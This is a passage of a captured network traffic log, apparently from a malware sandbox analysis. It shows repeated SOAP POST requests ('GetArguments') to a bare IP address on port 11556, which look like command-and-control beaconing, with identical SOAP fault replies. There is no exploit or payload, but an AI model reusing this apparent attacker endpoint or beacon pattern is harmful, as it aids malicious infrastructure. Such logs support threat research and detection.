                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:54.042444944 CEST10694INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:54.131872892 CEST10695INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:53 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:55.140132904 CEST10696OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:55.210470915 CEST10696INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:55.281048059 CEST10697INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:54 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:56.296049118 CEST10697OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:56.380639076 CEST10697INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:56.450217962 CEST10698INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:55 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:57.467809916 CEST10699OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:57.538265944 CEST10699INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:57.613348961 CEST10701INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:56 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:58.625468016 CEST10701OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:58.694870949 CEST10701INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:58.765242100 CEST10702INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:57 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:59.781100035 CEST10702OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:59.849970102 CEST10702INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:59.922252893 CEST10704INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:58 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:10:00.937392950 CEST10704OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:10:01.006602049 CEST10704INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:10:01.087409019 CEST10705INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:10:00 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 